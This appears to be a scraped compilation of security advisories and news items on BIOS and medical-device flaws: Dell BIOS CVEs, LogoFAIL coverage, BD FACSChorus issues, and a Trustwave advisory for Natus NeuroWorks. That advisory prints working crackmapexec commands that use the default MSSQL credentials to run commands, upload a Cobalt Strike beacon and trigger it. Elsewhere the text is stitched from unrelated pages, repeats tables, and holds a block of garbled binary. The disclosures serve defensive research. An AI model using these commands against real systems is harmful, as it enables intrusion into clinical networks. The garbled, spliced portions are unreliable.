
Dell PowerEdge platforms 16G Intel E5 BIOS and Dell Precision BIOS, version 1.4.4, contain active debug code security vulnerability. An unauthenticated physical attacker could potentially exploit this vulnerability, leading to information tampering, code execution, denial of service.



**Impact**

High

**Details**

Proprietary Code CVEs

Description

CVSS Base Score

CVSS Vector String

CVE-2023-44297

Dell PowerEdge platforms 16G Intel E5 BIOS and Dell Precision BIOS, version 1.4.4, contain active debug code security vulnerability. An unauthenticated physical attacker could potentially exploit this vulnerability, leading to information disclosure, information tampering, code execution, denial of service.

7.1

CVSS:3.1/AV:P/AC:H/PR:N/UI:N/S:C/C:H/I:H/A:L 

CVE-2023-44298

Dell PowerEdge platforms 16G Intel E5 BIOS and Dell Precision BIOS, version 1.4.4, contain active debug code security vulnerability. An unauthenticated physical attacker could potentially exploit this vulnerability, leading to information tampering, code execution, denial of service.

3.6

CVSS:3.1/AV:P/AC:H/PR:N/UI:N/S:C/C:N/I:L/A:L 

Proprietary Code CVEs

Description

CVSS Base Score

CVSS Vector String

CVE-2023-44297

Dell PowerEdge platforms 16G Intel E5 BIOS and Dell Precision BIOS, version 1.4.4, contain active debug code security vulnerability. An unauthenticated physical attacker could potentially exploit this vulnerability, leading to information disclosure, information tampering, code execution, denial of service.

7.1

CVSS:3.1/AV:P/AC:H/PR:N/UI:N/S:C/C:H/I:H/A:L 

CVE-2023-44298

Dell PowerEdge platforms 16G Intel E5 BIOS and Dell Precision BIOS, version 1.4.4, contain active debug code security vulnerability. An unauthenticated physical attacker could potentially exploit this vulnerability, leading to information tampering, code execution, denial of service.

3.6

CVSS:3.1/AV:P/AC:H/PR:N/UI:N/S:C/C:N/I:L/A:L 

Dell Technologies recommends all customers consider both the CVSS base score and any relevant temporal and environmental scores that may impact the potential severity associated with a particular security vulnerability.

**Affected Products and Remediation**

The Affected Products and Remediation table above may not be a comprehensive list of all affected supported versions and may be updated as more information becomes available.  

**Workarounds and Mitigations**

None

**Revision History**

Revision

Date

Description

1.0

2023-12-04

Initial release

**Related Information**

Dell Security Advisories and Notices  
Dell Vulnerability Response Policy  
CVSS Scoring Guide

PowerEdge C6620, PowerEdge HS5610, PowerEdge HS5620, PowerEdge MX760c, PowerEdge R660, PowerEdge R660xs, PowerEdge R760, PowerEdge R760XA, PowerEdge R760xd2, PowerEdge R760xs, PowerEdge R860, PowerEdge R960, PowerEdge T560

CVE-2023-44298: DSA-2023-429: Security Update for Dell 16G PowerEdge Server BIOS for a Debug Code Security Vulnerability

The Unified Extensible Firmware Interface (UEFI) code from various independent firmware/BIOS vendors (IBVs) has been found vulnerable to potential attacks through high-impact flaws in image parsing libraries embedded into the firmware.
The shortcomings, collectively labeled LogoFAIL by Binarly, "can be used by threat actors to deliver a malicious payload and bypass Secure Boot, Intel

Technology / Firmware Security

The Unified Extensible Firmware Interface (UEFI) code from various independent firmware/BIOS vendors (IBVs) has been found vulnerable to potential attacks through high-impact flaws in image parsing libraries embedded into the firmware.

The shortcomings, collectively labeled **LogoFAIL** by Binarly, "can be used by threat actors to deliver a malicious payload and bypass Secure Boot, Intel Boot Guard, and other security technologies by design."

Furthermore, they can be weaponized to bypass security solutions and deliver persistent malware to compromised systems during the boot phase by injecting a malicious logo image file into the EFI system partition.

While the issues are not silicon-specific, meaning they impact both x86 and ARM-based devices, they are also UEFI and IBV-specific. The vulnerabilities comprise a heap-based buffer overflow flaw and an out-of-bounds read, details of which are expected to be made public later this week at the Black Hat Europe conference.

Specifically, these vulnerabilities are triggered when the injected images are parsed, leading to the execution of payloads that could hijack the flow and bypass security mechanisms.

"This attack vector can give an attacker an advantage in bypassing most endpoint security solutions and delivering a stealth firmware bootkit that will persist in an ESP partition or firmware capsule with a modified logo image," the firmware security company said.

In doing so, threat actors could gain entrenched control over the impacted hosts, resulting in the deployment of persistent malware that can fly under the radar.

Unlike BlackLotus or BootHole, it's worth noting that LogoFAIL doesn't break runtime integrity by modifying the boot loader or firmware component.

The flaws affect all major IBVs like AMI, Insyde, and Phoenix as well as hundreds of consumer and enterprise-grade devices from vendors, including Intel, Acer, and Lenovo, making it both severe and widespread.

The disclosure marks the first public demonstration of attack surfaces related to graphic image parsers embedded into the UEFI system firmware since 2009, when researchers Rafal Wojtczuk and Alexander Tereshkin presented how a BMP image parser bug could be exploited for malware persistence.

"The types – and sheer volume – of security vulnerabilities discovered \[...\] show pure product security maturity and code quality in general on IBVs reference code," Binarly noted.

Found this article interesting? Follow us on Twitter __ and LinkedIn to read more exclusive content we post.

LogoFAIL: UEFI Vulnerabilities Expose Devices to Stealth Malware Attacks

Hundreds of consumer and enterprise-grade x86 and ARM models from various vendors, including Intel, Acer, and Lenovo, are potentially vulnerable to bootkits and takeover.

Source: Tetra Images via Alamy Stock Photo

Researchers have uncovered "LogoFAIL," a set of critical vulnerabilities present in the Unified Extensible Firmware Interface (UEFI) ecosystem for PCs.

Exploitation of the vulnerabilities nullify essential endpoint security measures and provide attackers with deep control over affected systems.

The flaws originate in image-parsing libraries within the boot process, impacting all major device manufacturers on both x86 and ARM-based devices, according to a Binarly Research report that will be officially released at Black Hat Europe in London next week.

The severity of LogoFAIL is exacerbated by its widespread reach, researchers warn, noting that it affects the entire ecosystem, not just individual vendors here and there. The findings were reported via the CERT/CC VINCE system, with anticipated vendor patches scheduled for December 6, in tandem with the Black Hat talk, which is entitled, "LogoFAIL: Security Implications of Image Parsing During System."

**Hijacking the Boot Process With LogoFAIL**

Binarly researchers found that by embedding compromised images in the EFI System Partition (ESP) or unsigned firmware update sections, threat actors can execute malicious code during boot-up, enabling them to hijack the boot process.

This exploitation bypasses crucial security measures like Secure Boot and Intel Boot Guard, facilitating the insertion of a persistent firmware bootkit operating beneath the OS level.

"Because the attacker is getting the privileged code execution into the firmware, it's bypassing the security boundaries by design, like a Secure Boot," explains Alex Matrosov, CEO and founder of Binarly. "The Intel Boot Guard and other trusted boot technologies are not extended in runtime, and after the firmware is verified, it just boots further in the system boot flow."

He says the Binarly Research team originally was experimenting with logo modification on one of the Lenovo devices they have in the lab.

"One day, it suddenly started to reboot after showing the boot logo," he says. "We realized that the root cause of the issue was the change of the original logo, which led to a deeper investigation."

He adds, "In this case, we are dealing with continued exploitation with a modified boot logo image, triggering the payload delivery in runtime, where all the integrity and security measurements happen before the firmware components are loaded.”

This is not the first Secure Boot bypass ever discovered; in November 2022, a firmware flaw was found in five Acer laptop models that could be used to disable Secure Boot and allow malicious actors to load malware; and the BlackLotus or BootHole threats have opened the door to boot process hijacking before. However, Matrosov says that LogoFAIL differs from prior threats because it doesn't break runtime integrity by modifying the bootloader or firmware component.

In fact, he says LogoFAIL is a data-only attack, occurring when malicious input comes from the firmware image or the logo is read from the ESP partition during the system boot process — and thus, it's hard to detect.

"Such an approach with the ESP attack vector leaves zero evidence of the firmware attack inside the firmware itself, since the logo comes from an outside source," he explains.

**Majority of the PC Ecosystem Is Vulnerable**

Devices equipped with firmware from the three major independent BIOS vendors (IBVs), Insyde, AMI, and Phoenix, are susceptible, indicating a potential impact across diverse hardware types and architectures. Between them, the three cover 95% of the BIOS ecosystem, Matrosov says.

In fact, Matrosov says LogoFAIL affects "most devices worldwide," including consumer and enterprise-grade PCs from various vendors —Acer, Gigabyte, HP, Intel, Lenovo, MSI, Samsung, Supermicro, Fujitsu, and "many others."

"The exact list of affected devices is still being determined, but it's crucial to note that all three major IBVs — AMI, Insyde, and Phoenix — are impacted due to multiple security issues related to image parsers they are shipping as a part of their firmware," the Binarly report warned. "We estimate LogoFAIL impacts almost any device powered by these vendors in one way or another."

For its part, Phoenix Technologies published an early security notification this week (now taken down but available as a cache until it goes back up Dec. 6) detailing that the bug (CVE-2023-5058) is present in all versions lower than 1.0.5 of its Phoenix SecureCore Technology 4, which is a BIOS firmware that provides advanced security features for various devices.

"The flaw exists in the processing of user-supplied splash screen during system boot, which can be exploited by an attacker who has physical access to the device," according to the notification, which noted that an updated version is available. "By supplying a malicious splash screen, the attacker can cause a denial-of-service attack or execute arbitrary code in the UEFI DXE phase, bypassing the Secure Boot mechanism and compromising the system integrity."

LogoFAIL is also tracked by Insyde as CVE-2023-40238, and by AMI as CVE-2023-39539 and CVE-2023-39538.

Matrosov says the company is actively collaborating with multiple device vendors to coordinate disclosure and mitigation efforts across the spectrum.

**Firmware Updates Key to Minimizing Risk**

To minimize firmware risk in general, users should stay updated with manufacturer advisories and promptly apply firmware updates, as they often address critical security flaws.

Also, vetting suppliers is a must. "Be picky about the device vendors you rely on daily as personal device or devices across your enterprise infrastructure," Matrosov adds. "Don't blindly trust the vendors, but rather validate the vendor's security promises and identify the gaps across your device inventory and beyond."

**About the Author(s)**

Nathan Eddy is a freelance journalist and award-winning documentary filmmaker specializing in IT security, autonomous vehicle technology, customer experience technology, and architecture and urban planning. A graduate of Northwestern University’s Medill School of Journalism, Nathan currently lives in Berlin, Germany.

Critical 'LogoFAIL' Bugs Offer Secure Boot Bypass for Millions of PCs

The FACSChorusâ„¢ workstation operating system does not restrict what devices can interact with its USB ports. If exploited, a threat actor with physical access to the workstation could gain access to system information and potentially exfiltrate data.

BD is authorized as a Common Vulnerability and Exposures (CVE) Numbering Authority (CNA) by the CVE® Program. As a CNA, BD is authorized to assign CVE identification numbers to newly discovered vulnerabilities in its software-enabled products, which includes using the Common Weakness Enumeration (CWE™) system to classify vulnerability types and applying the Common Vulnerability Scoring System (CVSS) to communicate vulnerability characteristics and severity.

BD has received no reports of these vulnerabilities being exploited.

BD assigned the following CVSS score to these vulnerabilities:

****1\. CVE-2023-29060 – Lack of USB Whitelisting****

**Vulnerability Description**: The FACSChorus™ workstation operating system does not restrict what devices can interact with its USB ports. If exploited, a threat actor with physical access to the workstation could gain access to system information and potentially exfiltrate data.

**CVSS: 5.4 (Medium)** CVSS:3.1/AV:P/AC:L/PR:L/UI:N/S:U/C:L/I:L/A:H

**Rationale**: The attack vector is physical, as the attacker must be present at the workstation. The attack complexity is low, and end-user interaction is not required. If exploited, a threat actor would not be able to gain access to other external components of the system. Impact to confidentiality and integrity is low, as there is no sensitive data stored on the workstation. The impact to availability is high as user access to the workstation can be disabled.

This vulnerability was reported to BD by security researcher Michael Aguilar (v3ga), a Principal Consultant at Secureworks, during the BD-sponsored Biohacking Village hosted at DEF CON 31.

****2\. CVE-2023-29061 – Lack of Adequate BIOS Authentication****

**Vulnerability Description**: There is no BIOS password on the FACSChorus™ workstation. A threat actor with physical access to the workstation can potentially exploit this vulnerability to access the BIOS configuration and modify the drive boot order and BIOS pre-boot authentication.

**CVSS: 5.2 (Medium)** CVSS:3.1/AV:P/AC:L/PR:N/UI:N/S:U/C:N/I:L/A:H

**Rationale**: The attack vector is physical, as the attacker must be present at the workstation. The complexity of the attack is low, and end-user interaction is not required. If exploited, a threat actor would not be able to gain access to other external components of the system. There is no impact to confidentiality because there is no sensitive data stored on the workstation. There is low impact to integrity because the threat actor cannot modify system information on the local drive. The impact to availability is high as the workstation boot process can be disabled.

This vulnerability was reported to BD by security researcher Michael Aguilar (v3ga), a Principal Consultant at Secureworks, during the BD-sponsored Biohacking Village hosted at DEF CON 31.

****3\. CVE-2023-29062 - Unsecure Identity Verification****

**Vulnerability Description**: The Operating System hosting the FACSChorus application is configured to allow transmission of hashed user credentials upon user action without adequately validating the identity of the requested resource. This is possible through the use of LLMNR, MBT-NS, or MDNS and will result in NTLMv2 hashes being sent to a malicious entity position on the local network. These hashes can subsequently be attacked through brute force and cracked if a weak password is used. This attack would only apply to domain joined systems.

**CVSS: 3.8 (Low)** CVSS:3.1/AV:A/AC:L/PR:N/UI:R/S:C/C:L/I:N/A:N

**Rationale:** An attacker must have access to the system's local network in order for the target to transact with the attack server. The complexity of the attack is low as once network access is attained the attack is repeatable and straightforward. No additional privileges are required to the system, but a successful attack relies on a user to issue a network request on the target system. Because this attack relies on user domain credentials, this compromise could affect access to other systems connected to the same domain, therefore scope is changed. The impact of this attack involves only confidentiality as only a single user's credentials are involved. There is no inherent impact to integrity and availability.

This vulnerability was reported to BD by security researcher Michael Aguilar (v3ga), a Principal Consultant at Secureworks, during the BD-sponsored Biohacking Village hosted at DEF CON 31.

****4\. CVE-2023-29063 – Lack of DMA Access Protections****

**Vulnerability Description**: The FACSChorus™ workstation does not prevent physical access to its PCI express (PCIe) slots, which could allow a threat actor to insert a PCI card designed for memory capture. A threat actor can then isolate sensitive information such as a BitLocker encryption key from a dump of the workstation RAM during startup.

**CVSS: 2.4 (Low)** CVSS:3.1/AV:P/AC:L/PR:N/UI:N/S:U/C:L/I:N/A:N

**Rationale**: The attack vector is physical, as the attacker must be able to access the workstation's internal PCI bus. The attack complexity is low, and end-user interaction is not required. If exploited, a threat actor would not be able to gain access to other components of the system. The impact to confidentiality is low because the information captured during the OS boot would not contain sensitive data. There is no impact to the integrity and availability of the workstation, as the data capture does not modify the OS and would not disable the workstation.

This vulnerability was reported to BD by security researcher Michael Aguilar (v3ga), a Principal Consultant at Secureworks, during the Biohacking Village hosted at DEF CON 31.

****5\. CVE-2023-29064 – Hardcoded Secrets****

**Vulnerability Description**: The FACSChorus™ software contains sensitive information stored in plaintext. A threat actor could gain hardcoded secrets used by the application, which include tokens and passwords for administrative accounts.

**CVSS: 4.1 (Medium)** CVSS:3.1AV:P/AC:L/PR:L/UI:N/S:U/C:L/I:L/A:L

**Rationale:** The attack vector is physical as the attacker must be present at the workstation. The attack complexity is low, and end-user interaction is not required. If exploited, a threat actor would not be able to gain access to other external components of the system. Due to the nature of the data contained within the application, the overall impact to data confidentiality is low. Impacts to data integrity and availability are mitigated when backup and restore controls are followed, thus remaining low.

****6\. CVE-2023-29065 – Overly Permissive Access Policy****

**Vulnerability Description**: The FACSChorus™ software database can be accessed directly with the privileges of the currently logged-in user. A threat actor with physical access could potentially gain credentials, which could be used to alter or destroy data stored in the database.

**CVSS: 4.1 (Medium)** CVSS:3.1/AV:P/AC:L/PR:L/UI:N/S:U/C:L/I:L/A:L

**Rationale**: The attack vector is physical, as the attacker must be present at the workstation. The attack complexity is low, and end-user interaction is not required. If exploited, a threat actor would not be able to gain access to other components of the system. The impact to confidentiality, integrity and availability is low because no sensitive data is stored on the workstation.

****7\. CVE-2023-29066 – Incorrect User Management****

**Vulnerability Description**: The FACSChorus™ software does not properly assign data access privileges for operating system user accounts. A non-administrative OS account can modify information stored in the local application data folders.

**CVSS: 3.2 (Low)** CVSS:3.1/AV:P/AC:L/PR:L/UI:N/S:U/C:N/I:L/A:L

**Rationale**: The attack vector is physical, as the OS is hardened to prevent remote desktop access. Attack complexity is low, and end-user interaction is not required. If exploited, a threat actor with standard OS user access could move or delete files that contain experiment data. FACSChorus™ data does not contain confidential information, so there is no impact to confidentiality. The impact to integrity and availability is low, as the loss of experiment data would not affect the operation of FACSChorus™ software or the workstation.

This vulnerability was reported to BD by security researcher Milind Sunilbhai Purswani during the BD-sponsored Biohacking Village at DEF CON 31.

CVE-2023-29060: BD FACSChorus Vulnerabilities - Software and Workstation


Dell Precision Tower BIOS contains an Improper Input Validation vulnerability. A locally authenticated malicious user with admin privileges could potentially exploit this vulnerability to perform arbitrary code execution.



**Impact**

High

**Details**

Proprietary Code CVEs

Description

CVSS Base Score

CVSS Vector String

CVE-2023-32469

Dell Precision Tower BIOS contains an Improper Input Validation vulnerability. A locally authenticated malicious user with admin privileges could potentially exploit this vulnerability to perform arbitrary code execution.

7.5

CVSS:3.1/AV:L/AC:H/PR:H/UI:N/S:C/C:H/I:H/A:H

Proprietary Code CVEs

Description

CVSS Base Score

CVSS Vector String

CVE-2023-32469

Dell Precision Tower BIOS contains an Improper Input Validation vulnerability. A locally authenticated malicious user with admin privileges could potentially exploit this vulnerability to perform arbitrary code execution.

7.5

CVSS:3.1/AV:L/AC:H/PR:H/UI:N/S:C/C:H/I:H/A:H

Dell Technologies recommends all customers consider both the CVSS base score and any relevant temporal and environmental scores that may impact the potential severity associated with a particular security vulnerability.

**Affected Products and Remediation**

Product

Software/Firmware

Affected Versions

Remediated Versions

BIOS Release Date

Update Link

Dell Precision 5820 Tower

BIOS

Versions prior to 2.32.0

2.32.0 or later

11/14/2023

Drivers & Downloads Link

Dell Precision 7820 Tower

BIOS

Versions prior to 2.36.0

2.36.0 or later

11/14/2023

Drivers & Downloads Link

Dell Precision 7920 Tower

BIOS

Versions prior to 2.36.0

2.36.0 or later

11/14/2023

Drivers & Downloads Link

Product

Software/Firmware

Affected Versions

Remediated Versions

BIOS Release Date

Update Link

Dell Precision 5820 Tower

BIOS

Versions prior to 2.32.0

2.32.0 or later

11/14/2023

Drivers & Downloads Link

Dell Precision 7820 Tower

BIOS

Versions prior to 2.36.0

2.36.0 or later

11/14/2023

Drivers & Downloads Link

Dell Precision 7920 Tower

BIOS

Versions prior to 2.36.0

2.36.0 or later

11/14/2023

Drivers & Downloads Link

**Acknowledgements**

Dell Technologies would like to thank another1024 for reporting this issue.  
 

**Revision History**

Revision

Date

Description

1.0

2023-11-14

Initial Release

1.1

2023-11-15

Updated the Affected Products and Remediation Table: Added Update Links

**Related Information**

Dell Security Advisories and Notices  
Dell Vulnerability Response Policy  
CVSS Scoring Guide

CVE-2023-32469: DSA-2023-223: Security Update for a Dell Precision Tower BIOS Vulnerability

AMI AptioV contains a vulnerability in BIOS where an Attacker may use an improper input validation via the local network. A successful exploit of this vulnerability may lead to a loss of confidentiality, integrity and availability.

f�:����{}��#���D���?� �~�ˋ������oȬ�0Ŋ���I��~��\_��xR�%�轓����L����齓����P����Jz����\*z�!�ƺ+��p� ��놰^D-�o4�qg C|�o��ͮ\[��RVq�W�"��p=q�r�~�%q��"���K���+\]�.؊����RKִ���k�N�9%��;~�Z����t�yek狽~N\*���s�/��i�=�&-�=l�n��P+������cJY��=܊ۈ{?8Oܓ:M��;К��G'�R �$��\*���x�����Ľ/���%��О�?�mxZ�@+���2b39 Eu���iĽ�'�Iv�U����Q3I���% N�#Ih)�' N�#I��iK�T{��Q�O�T{�P�Ԛ$8��$a\]�p��ZB�$f�k�|��� E�HLxl�1���$��$���IBn�/�C-��.خ$�z�$|�J�IBl�$ ^D�E�5mI�5MO���o%' NǴ$�Ǧ5� �L�\]��OKlҒ$�mҝ$8Ԥ$�w-Cj+�3I��$��O�:M Ip��IBt�\*���$!\\��$�'�O�x�$�/���%' =�}��ܶ�i�MKb�F Eu& a�7��(s�����d���q�wZ����It�ީ�i\[���W�t�䙻�j\_�S�Ժz�I���Y�)�.ǵ������IѲ����

CVE-2023-39535

Improper input validation in some Intel(R) Server Board BIOS firmware may allow a privileged user to potentially enable escalation of privilege via local access

CVE-2023-34431

Improper input validation in the BIOS firmware for some Intel(R) Processors may allow an authenticated user to potentially enable denial of service via adjacent access.

CVE-2023-22329

Natus NeuroWorks and SleepWorks before 8.4 GMA3 utilize a default password of xltek for the Microsoft SQL Server service sa account, allowing a threat actor to perform remote code execution, data exfiltration, or other nefarious actions such as tampering with data or destroying/disrupting MSSQL services.

Trustwave SpiderLabs Security Advisory TWSL2023-006: Default MSSQL Database Password in Natus NeuroWorks EEG Software Published: 11/07/2023 Version: 1.0 Vendor: Natus https://natus.com/products-services/natus-neuroworks-eeg-software Product: NeuroWorks EEG Software Version affected: Prior to 8.4 GMA3 Product description: The Natus NeuroWorks platform simplifies the process of collecting, monitoring, trending and managing data for routine EEG testing, ambulatory EEG, long-term monitoring, ICU monitoring, and research studies. NeuroWorks systems are scalable to meet the needs of private practice clinics, hospitals, large teaching facilities and EEG service providers. Natus NeuroWorks is a cutting-edge, single solution for EEG, LTM, ICU, Sleep, and Research Studies, exhibiting an advanced software for clinical excellence. The Microsoft SQL-based NeuroWorks database is a powerful tool that simplifies the management of patient, study and laboratory data. Filter studies by date, status, diagnosis, or use any built-in editable field to create custom filters for your unique needs. Track outcomes and filter by statistical indices that are calculated in the reports. The distributed database automatically updates system settings across the network to ensure that all workstations have current lab settings. Finding 1: Default Password for Natus NeuroWorks EEG Software MSSQL Database \*\*\*\*\*Credit: John Jackson of Trustwave Natus NeuroWorks EEG Software utilizes their own custom MSSQL configuration and database for the management of medical research studies connected to the testing and monitoring software implemented via the Natus NeuroWorks platform. By default, the MSSQL service utilizes the administrative username 'sa' coupled with the password 'xltek'. An attacker can utilize the default credentials to access stored sensitive data or perform administrative functions and MSSQL queries. In addition, an attacker on the local network could potentionally leverage the credentials to access the file system of the server and perform read, write, and execution functions on the disk. Natus recommends against changing the default password as it will disable MigrateDB's ability to authenticate silently in instances of new virtual database creation. Proof of Concept/Summary: While the instance of default credentials is properly documented within the "XL Security Site Administrator Reference" guide, Natus specifically recommends against changing the default credentials. The document specifically states: "Each instance of SQL Server also has a system administrator username ('sa'). The default password is 'xltek'; however it can be changed for each instance of SQL Server. We strongly recommend using the default password for local SQL Server instances". Natus recommends against changing the password, because of their MigrateDB function. The document goes on to say: "MigrateDB is also called silently when a new 'virtual database' is created through Natus Database - XLDB. In this case, MigrateDB will not prompt the user for the 'sa' password. If the password for 'sa' has been altered on the local machine from its default, the creation of a new virtual server will fail". They do however recommend a workaround, which is to change the password back to xltek while performing new virtual database creation, and then once again change back to the default. ## Running the command 'whoami' using default credentials └─$ crackmapexec mssql SERVERNAME -u 'sa' -p 'xltek' --local-auth -x 'whoami' MSSQL SERVERNAME 1433 SERVERNAME \[\*\] Windows 10.0 Build 14393 (name:SERVERNAME) (domain:SERVERNAME) MSSQL SERVERNAME 1433 SERVERNAME \[-\] SERVERNAME\\sa:xltek table users has no column named pillaged\_from\_computerid MSSQL SERVERNAME 1433 SERVERNAME \[+\] Executed command via mssqlexec MSSQL SERVERNAME 1433 SERVERNAME -------------------------------------------------------------------------------- MSSQL SERVERNAME 1433 SERVERNAME nt authority\\network service ## Writing a cobalt strike beacon to a local windows directory └─$ crackmapexec mssql SERVERNAME -u 'sa' -p 'xltek' --local-auth --put-file /home/mrhacking/Desktop/cobaltstrike/payloads/armsvc.exe C:\\\\Temp\\\\Events\\\\armsvc.exe MSSQL SERVERNAME 1433 SERVERNAME \[\*\] Windows 10.0 Build 14393 (name:SERVERNAME) (domain:SERVERNAME) MSSQL SERVERNAME 1433 SERVERNAME \[-\] SERVERNAME\\sa:xltek table users has no column named pillaged\_from\_computerid MSSQL SERVERNAME 1433 SERVERNAME \[\*\] Copy /home/mrhacking/Desktop/cobaltstrike/payloads/armsvc.exe to C:\\Temp\\Events\\armsvc.exe MSSQL SERVERNAME 1433 SERVERNAME \[\*\] Size is 409088 bytes MSSQL SERVERNAME 1433 SERVERNAME \[+\] File has been uploaded on the remote machine └─$ crackmapexec mssql SERVERNAME -u 'sa' -p 'xltek' --local-auth -x 'dir C:\\Temp\\Events\\' MSSQL SERVERNAME 1433 SERVERNAME \[\*\] Windows 10.0 Build 14393 (name:SERVERNAME) (domain:SERVERNAME) MSSQL SERVERNAME 1433 SERVERNAME \[-\] SERVERNAME\\sa:xltek table users has no column named pillaged\_from\_computerid MSSQL SERVERNAME 1433 SERVERNAME \[+\] Executed command via mssqlexec MSSQL SERVERNAME 1433 SERVERNAME -------------------------------------------------------------------------------- MSSQL SERVERNAME 1433 SERVERNAME Volume in drive C is Windows MSSQL SERVERNAME 1433 SERVERNAME Volume Serial Number is A050-B8DA MSSQL SERVERNAME 1433 SERVERNAME Directory of C:\\Temp\\Events MSSQL SERVERNAME 1433 SERVERNAME 06/15/2023 02:54 PM

. MSSQL SERVERNAME 1433 SERVERNAME 06/15/2023 02:54 PM

.. MSSQL SERVERNAME 1433 SERVERNAME 06/23/2023 02:31 PM 409,088 armsvc.exe MSSQL SERVERNAME 1433 SERVERNAME 1 File(s) 409,088 bytes MSSQL SERVERNAME 1433 SERVERNAME 2 Dir(s) 34,903,302,144 bytes free ## Triggering the cobalt strike beacon └─$ crackmapexec mssql SERVERNAME -u 'sa' -p 'xltek' --local-auth -x 'cmd.exe /c start C:\\Temp\\Events\\armsvc.exe' MSSQL SERVERNAME 1433 SERVERNAME \[\*\] Windows 10.0 Build 14393 (name:SERVERNAME) (domain:SERVERNAME) MSSQL SERVERNAME 1433 SERVERNAME \[-\] SERVERNAME\\sa:xltek table users has no column named pillaged\_from\_computerid MSSQL SERVERNAME 1433 SERVERNAME \[+\] Executed command via mssqlexec MSSQL SERVERNAME 1433 SERVERNAME None ## Beacon command execution proof beacon> sleep 0 \[\*\] Tasked beacon to become interactive \[+\] host called home, sent: 16 bytes beacon> getuid \[\*\] Tasked beacon to get userid \[+\] host called home, sent: 8 bytes \[\*\] You are NT AUTHORITY\\NETWORK SERVICE beacon> run systeminfo \[\*\] Tasked beacon to run: systeminfo \[+\] host called home, sent: 28 bytes \[+\] received output: Host Name: SERVERNAME OS Name: Microsoft Windows 10 Enterprise 2016 LTSB OS Version: 10.0.14393 N/A Build 14393 OS Manufacturer: Microsoft Corporation OS Configuration: Member Workstation OS Build Type: Multiprocessor Free Registered Owner: Windows User Registered Organization: Product ID: XXXXX-XXXXX-XXXXX-XXXXX Original Install Date: 6/6/2017, 5:39:30 PM System Boot Time: 6/17/2023, 2:07:18 PM System Manufacturer: Dell Inc. System Model: OptiPlex 5050 System Type: x64-based PC Processor(s): 1 Processor(s) Installed. \[01\]: Intel64 Family 6 Model 94 Stepping 3 GenuineIntel ~3312 Mhz BIOS Version: Dell Inc. 1.11.1, 11/29/2018 Windows Directory: C:\\windows System Directory: C:\\windows\\system32 Boot Device: \\Device\\HarddiskVolume1 System Locale: en-us;English (United States) Input Locale: en-us;English (United States) Time Zone: (UTC-05:00) Eastern Time (US & Canada) Total Physical Memory: 8,051 MB Available Physical Memory: 5,344 MB Virtual Memory: Max Size: 16,243 MB Virtual Memory: Available: 13,210 MB Virtual Memory: In Use: 3,033 MB Page File Location(s): C:\\pagefile.sys Domain: REDACTED FOR PRIVACY Logon Server: N/A Hotfix(s): 6 Hotfix(s) Installed. \[01\]: KB4013418 \[02\]: KB4033631 \[03\]: KB4049411 \[04\]: KB4103729 \[05\]: KB4132216 \[06\]: KB4103720 Network Card(s): 1 NIC(s) Installed. \[01\]: Intel(R) Ethernet Connection (5) I219-V Connection Name: LAN DHCP Enabled: Yes DHCP Server: X.X.X.X IP address(es) \[01\]: X.X.X.X Hyper-V Requirements: VM Monitor Mode Extensions: Yes Virtualization Enabled In Firmware: Yes Second Level Address Translation: Yes Data Execution Prevention Available: Yes Vendor Response: The vendor has revised the Administrator Reference document by discontinuing the endorsement of default password usage. Instead, the vendor strongly recommends that all users change default SQL credentials. This requires to update the software to leverage the Credentials Cache feature, introduced in version 8.4 GMA3. The technical service team will provide the revised documentation to customers on request, and in the future, it will be integrated into the Neuroworks software installation package. The vendor has additionally released a security advisory regarding this threat. You can access the security bulletin at this link: https://natus.bynder.com/m/7cd3bcca88e446d4/original/NeuroWorks-SleepWorks-Product-Security-Bulletin.pdf Remediation Steps: Upgrade to GMA3 version 8.4 or a higher version to enable the credential cache feature and update the default SQL credentials. Revision History: 06/27/2023 - Trustwave disclosed vulnerability to vendor 07/07/2023 - Vendor provides Trustwave with preliminary version of the updated documentation 07/18/2023 - Vendor has provided Trustwave with remediation plan 10/20/2023 - Vendor publishes security bulletin 11/07/2023 - Advisory published References 1. https://natus.bynder.com/m/7cd3bcca88e446d4/original/NeuroWorks-SleepWorks-Product-Security-Bulletin.pdf About Trustwave: Trustwave helps businesses fight cybercrime, protect data and reduce security risk. With cloud and managed security services, integrated technologies and a team of security experts, ethical hackers and researchers, Trustwave enables businesses to transform the way they manage their information security and compliance programs. More than three million businesses are enrolled in the Trustwave TrustKeeper® cloud platform, through which Trustwave delivers automated, efficient and cost-effective threat, vulnerability and compliance management. Trustwave is headquartered in Chicago, with customers in 96 countries. For more information about Trustwave, visit https://www.trustwave.com. About Trustwave SpiderLabs: SpiderLabs(R) is the advanced security team at Trustwave focused on application security, incident response, penetration testing, physical security and security research. The team has performed over a thousand incident investigations, thousands of penetration tests and hundreds of application security tests globally. In addition, the SpiderLabs Research team provides intelligence through bleeding-edge research and proof of concept tool development to enhance Trustwave's products and services. https://www.trustwave.com/spiderlabs Disclaimer: The information provided in this advisory is provided "as is" without warranty of any kind. Trustwave disclaims all warranties, either express or implied, including the warranties of merchantability and fitness for a particular purpose. In no event shall Trustwave or its suppliers be liable for any damages whatsoever including direct, indirect, incidental, consequential, loss of business profits or special damages, even if Trustwave or its suppliers have been advised of the possibility of such damages. Some states do not allow the exclusion or limitation of liability for consequential or incidental damages so the foregoing limitation may not apply.

CVE-2023-47800

A vulnerability was reported in some ThinkPad BIOS that could allow a physical or local attacker with elevated privileges to tamper with BIOS firmware.

**About Lenovo**

*   Our Company
*   News
*   Investor Relations
*   Sustainability
*   Product Compliance
*   Product Security
*   Lenovo Open Source
*   Legal Information
*   Jobs at Lenovo

**Shop**

*   Laptops & Ultrabooks
*   Tablets
*   Desktops & All-in-Ones
*   Workstations
*   Accessories & Software
*   Servers
*   Storage
*   Networking
*   Laptop Deals
*   Outlet

**Support**

*   Drivers & Software
*   How To's
*   Warranty Lookup
*   Parts Lookup
*   Contact Us
*   Repair Status Check
*   Imaging & Security Resources
*   Glossary

**Resources**

*   Where to Buy
*   Shopping Help
*   Track Order Status
*   Product Specifications (PSREF)
*   Forums
*   Registration
*   Product Accessibility
*   Environmental Information
*   Gaming Community
*   LenovoEDU Community
*   LenovoPRO Community

© Lenovo.  
| | | |

Tag

#bios